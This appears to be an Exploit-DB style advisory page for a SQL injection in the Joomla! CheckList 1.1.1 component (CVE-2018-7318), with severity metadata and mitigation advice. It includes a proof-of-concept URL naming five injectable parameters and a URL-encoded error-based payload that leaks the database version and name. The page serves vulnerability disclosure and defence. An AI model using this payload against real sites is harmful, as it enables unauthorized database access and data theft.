Joomla! Component CheckList 1.1.1 - SQL Injection

vendor:

Checklist

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Checklist

Affected Version From: 1.1.1

Affected Version To: 1.1.1

Patch Exists: YES

Related CWE: CVE-2018-7318

CPE: a:joomplace:checklist:1.1.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component CheckList 1.1.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component CheckList 1.1.1. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in application's database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the affected parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component CheckList 1.1.1 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.joomplace.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
# Version: 1.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7318
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_checklist&view=frontend
# &title_search=[SQL]
# &tag_search=[SQL]
# &name_search=[SQL]
# &description_search=[SQL]
# &filter_order=[SQL]
# 
# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69
# 
# # # #